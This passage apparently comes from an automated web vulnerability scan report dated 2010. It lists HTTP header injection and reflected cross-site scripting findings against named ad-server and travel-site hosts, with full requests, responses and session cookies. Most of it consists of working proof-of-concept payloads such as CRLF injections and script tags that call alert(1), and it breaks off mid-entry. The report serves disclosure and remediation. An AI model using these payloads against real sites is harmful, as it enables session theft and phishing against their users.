The value of REST URL parameter 1 is copied into the Location response header. The payload 7246c%0d%0a336f6cb6a43 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7246c%0d%0a336f6cb6a43/N553.ae.travelocity/B4838870.9 HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7246c 336f6cb6a43/N553.ae.travelocity/B4838870.9: Date: Sun, 12 Dec 2010 15:55:04 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 406f4%0d%0af4aac9b858d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /406f4%0d%0af4aac9b858d/N5762.218.EXPEDIA1/B4799014.4 HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/406f4 f4aac9b858d/N5762.218.EXPEDIA1/B4799014.4: Date: Sun, 12 Dec 2010 15:55:04 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5c11b%0d%0ae5159c39387 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5c11b%0d%0ae5159c39387/N553.ae.travelocity/B4838870.9;abr=!ie;sz=300x250;pc=[TPAS_ID];ord=kvydWa,bgqjIpabtsqs? HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5c11b e5159c39387/N553.ae.travelocity/B4838870.9%3Babr%3D%21ie%3Bsz%3D300x250%3Bpc%3D%5BTPAS_ID%5D%3Bord%3DkvydWa%2CbgqjIpabtsqs: Date: Sun, 12 Dec 2010 15:55:08 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 9c23b%0d%0a11544046e95 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9c23b%0d%0a11544046e95/side.us.ky.web.car/results HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9c23b 11544046e95/side.us.ky.web.car/results: Date: Sun, 12 Dec 2010 15:54:58 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 97f69%0d%0ad27e7c101a5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /97f69%0d%0ad27e7c101a5/side.us.ky.web.flight/results;oco=US;ost=TX;oci=HOUSTON;ocid=Houston;co=US;st=CA;ci=SAN_FRANCISCO;cid=San+Francisco;sd=26;sm=11;sy=2010;ed=2;em=0;ey=2011;cc=e;isTest=N;searchid=OlWNcX;sz=300x250;tile=14;source=direct;u=sid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852;ord=1292168658272? HTTP/1.1 Host: redacted.host.name Proxy-Connection: keep-alive Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/97f69 d27e7c101a5/side.us.ky.web.flight/results%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%20Francisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26oc: Date: Sun, 12 Dec 2010 15:48:35 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1db0e%0d%0a00880bed410 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1db0e%0d%0a00880bed410/side.us.ky.web.hotel/results HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1db0e 00880bed410/side.us.ky.web.hotel/results: Date: Sun, 12 Dec 2010 15:54:59 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 80f50%0d%0a80f3182b8b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /80f50%0d%0a80f3182b8b0/N5762.218.EXPEDIA1/B4799014.4 HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/80f50 80f3182b8b0/N5762.218.EXPEDIA1/B4799014.4: Date: Sun, 12 Dec 2010 15:55:14 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7330f%0d%0a85cdd6a7713 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7330f%0d%0a85cdd6a7713/priceline.dart/air_fare_results HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7330f 85cdd6a7713/priceline.dart/air_fare_results: Date: Sun, 12 Dec 2010 15:55:14 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6f13d%0d%0ad1573db9588 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6f13d%0d%0ad1573db9588/priceline.dart/air_fare_results_box HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6f13d d1573db9588/priceline.dart/air_fare_results_box: Date: Sun, 12 Dec 2010 15:55:17 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7bfd9%0d%0a4c013aaf98a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7bfd9%0d%0a4c013aaf98a/N4253.expedia/B4807301.3 HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: https://redacted.hostnameredacted.hostname/7bfd9 4c013aaf98a/N4253.expedia/B4807301.3: Date: Sun, 12 Dec 2010 15:55:10 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3dfb3%0d%0adb56d3ead8e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3dfb3%0d%0adb56d3ead8e/N4253.expedia/B4807301.3;abr=!ie4;abr=!ie5;sz=160x600;ord=dqafok,bgqjIpouImwl? HTTP/1.1 Host: redacted.host.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: https://redacted.hostnameredacted.hostname/3dfb3 db56d3ead8e/N4253.expedia/B4807301.3%3Babr%3D%21ie4%3Babr%3D%21ie5%3Bsz%3D160x600%3Bord%3Ddqafok%2CbgqjIpouImwl: Date: Sun, 12 Dec 2010 15:55:24 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload ff091%0d%0ad5095d46e22 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ff091%0d%0ad5095d46e22/ShowCreateAccount.do HTTP/1.1 Host: travel.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T0042007014101212094421020188304057814; Service=Travelocity; JSESSIONID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; intentmedia_user_id=8f13f3ec-a554-4082-b332-38c3d456e131; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; AIR=returningDate=01/02/2011&flightType=roundtrip&children=0&airlineSearchPref=&classOfService=ECONOMY&leavingDate=12/26/2010&minorsAge0=0&dateTypeSelect=exactDates&dateLeavingTime=Anytime&lowestFare=705&leavingFrom=HOU&seniors=0&fareType=all&adults=1&dateReturningTime=Anytime&minorsAge1=0&goingTo=SFO&minorsAge2=0&minorsAge3=0&minorsAge4=0; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 16:02:11 GMT Server: Apache Location: http://travel.travelocity.com/ff091 d5095d46e22/ShowCreateAccount.do;jsessionid=D97A419890F94FF6FEEE1A7CB80C0B53.p0608 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=ISO-8859-1
4. Cross-site scripting (reflected)previous There are 74 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1244a"><script>alert(1)</script>fbde8380697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe1244a"><script>alert(1)</script>fbde8380697/3.0/5147/1125747/0/154/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 231
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71de"><script>alert(1)</script>fe6a5d0e85f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0b71de"><script>alert(1)</script>fe6a5d0e85f/5147/1125747/0/154/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 231
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b1ec"><script>alert(1)</script>1ed84af3af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/51474b1ec"><script>alert(1)</script>1ed84af3af/1125747/0/154/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 230
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e4a"><script>alert(1)</script>dfdf807cf83 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/112574713e4a"><script>alert(1)</script>dfdf807cf83/0/154/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 231
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5585"><script>alert(1)</script>81e00ef81c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0f5585"><script>alert(1)</script>81e00ef81c0/154/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 231
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c09"><script>alert(1)</script>3d29c6dd0b1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/15446c09"><script>alert(1)</script>3d29c6dd0b1/ADTECH HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 231
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba151"><script>alert(1)</script>5ede65b9fda was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECHba151"><script>alert(1)</script>5ede65b9fda HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 231
4.8. http://adserver.adtechus.com/adiframe/3.0/5147/1125747/0/154/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe/3.0/5147/1125747/0/154/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5a4"><script>alert(1)</script>a0a975e1ad0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECH?5e5a4"><script>alert(1)</script>a0a975e1ad0=1 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 234
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a4d"><script>alert(1)</script>431e51e6970 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECH;target=_blank;key=33a4d"><script>alert(1)</script>431e51e6970 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 252
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d5c8c><script>alert(1)</script>e91811460c4 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECH;target=d5c8c><script>alert(1)</script>e91811460c4 HTTP/1.1 Host: adserver.adtechus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 276
The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4649e%20style%3dx%3aexpression(alert(1))%20a0d5648a0d5 was submitted in the sealid parameter. This input was echoed as 4649e style=x:expression(alert(1)) a0d5648a0d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pvr.php?page=validate&url=www.cheapoair.com&sealid=1014649e%20style%3dx%3aexpression(alert(1))%20a0d5648a0d5 HTTP/1.1 Host: clicktoverify.truste.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:56:01 GMT Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4 X-Powered-By: PHP/5.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 10799
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Validation Page for Online Privacy Certification b ...[SNIP]... <input type='hidden' name='sealid' value=1014649e style=x:expression(alert(1)) a0d5648a0d5> ...[SNIP]...
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62b9e"%3balert(1)//782c32c02ce was submitted in the mpck parameter. This input was echoed as 62b9e";alert(1)//782c32c02ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/1091/united_econPlus_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-1%3Fmpt%3D163030862b9e"%3balert(1)//782c32c02ce&mpt=1630308&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/y%3B232570606%3B0-0%3B4%3B26971087%3B2321-160/600%3B38775193/38792950/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D160x600%3Btile%3D13%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:57:58 GMT Server: Apache Last-Modified: Thu, 07 Oct 2010 15:56:06 GMT ETag: "64f0ae-b7b-49208ee861180" Accept-Ranges: bytes Content-Length: 6802 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aee7b"%3balert(1)//b205ebd6df3 was submitted in the mpvc parameter. This input was echoed as aee7b";alert(1)//b205ebd6df3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/1091/united_econPlus_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-1%3Fmpt%3D1630308&mpt=1630308&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/y%3B232570606%3B0-0%3B4%3B26971087%3B2321-160/600%3B38775193/38792950/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3faee7b"%3balert(1)//b205ebd6df3 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D160x600%3Btile%3D13%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:58:14 GMT Server: Apache Last-Modified: Thu, 07 Oct 2010 15:56:06 GMT ETag: "64f0ae-b7b-49208ee861180" Accept-Ranges: bytes Content-Length: 6778 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c68e7"%3balert(1)//4b54cb0ffd3 was submitted in the mpck parameter. This input was echoed as c68e7";alert(1)//4b54cb0ffd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
